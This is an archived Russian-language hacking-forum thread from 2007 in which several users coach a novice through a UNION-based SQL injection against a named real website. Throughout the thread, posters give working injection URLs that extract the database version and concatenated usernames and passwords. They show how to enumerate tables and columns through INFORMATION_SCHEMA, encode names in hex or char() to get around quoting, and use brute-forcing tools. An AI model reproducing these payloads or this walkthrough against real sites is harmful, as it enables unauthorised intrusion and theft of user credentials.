Просмотр полной версии : SQL-inj
Qwertison
19.08.2007, 16:15
Вот SQL-inj http://mir-tech.ru/select.php?cat=2&categ=2&l=0&cat_num=25&mess=-1
Можете мне обьяснить дураку, ато я никак не пойму как подбирать количество столбцов и их названия?
Basurman
19.08.2007, 16:46
А там нет скули. Поищи другие скрипты
Qwertison
19.08.2007, 16:48
Всмысле, ошибка же есть?
Там не смотрел, но вот тут она точно есть
хттп://mir-tech.ru/group.php?cat=-1+union+select+version()/*
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(name,0x3a,password)+from+mai n_users/*
Qwertison
20.08.2007, 13:33
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
phol1eadeux
20.08.2007, 13:46
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Можно вручную, либо специализированными программами-брутерами
Qwertison
20.08.2007, 13:48
Какими например, я таких не видел.
phol1eadeux
20.08.2007, 13:55
SQL Bruter (http://inattack.ru/forum/index.php?act=Attach&type=post&id=652) - одна из них
хттп://mir-tech.ru/group.php?cat=-1+union+select+concat(user,0x3a,password)+from+mai n_users/*-
Unknown column 'user' in 'field list'
Еще вопрос. А как ты узнаеш как называется табл. . Main_users, users или accaunts. Так и user, username, password, pass, passwd. Это нужно все комбинации по-очереди пробовать?
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:
union select TABLE_NAME from INFORMATION_SCHEMA.TABLES limit 0,1/*
А потом колонки в интересующей нас табле:
union select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Версия мускуля 5, а значит можно их просто посмотреть и выбрать то что нужно, так перебираются таблици:
union select TABLE_NAME from INFORMATION.SCHEMA_TABLES limit 0,1/*
А потом колонки в интересующей нас табле:
union select COLUMN_NAME from INFORMATION.SCHEMA_COLUMNS where TABLE_NAME='имя_таблици' limit 0,1/*
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
Все так, только
INFORMATION_SCHEMA.TABLES и INFORMATION_SCHEMA.COLUMNS
опечатался =)
Qwertison
20.08.2007, 14:50
Уже надеялся что все.. Смотрю название таблы - http://mir-tech.ru/group.php?cat=-1+union+select+TABLE_NAME+fron+INFORMATION_SCHEMA. TABLES limit 0,1/*
Называется CHARACTER_SETS.
Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???
Ищу колумн -_http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME='CHARACTER_SETS' limit 0,1/* - не пашет???
http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=0x4348415241435445525f53 455453 limit 0,1/*
delay(0)
20.08.2007, 21:54
Можно и так,
http://mir-tech.ru/group.php?cat=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=char(67,72,65,82,65,67,8 4,69,82,95,83,69,84,83)+limit+2,1/*
Taylorith
20.08.2007, 22:48
Qwertison
у тя с головой все ок???
я втеме ваши уячзвимости написал тчо икак .... меня бесят такие люди.. тока флудить могут какого зхрена ты создаешь тему клоН?????? ваще чтоли даун... больше слов нет
Серенький
21.08.2007, 00:44
для подбора таблиц и много для чего -
SQl Injection tool, советую
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot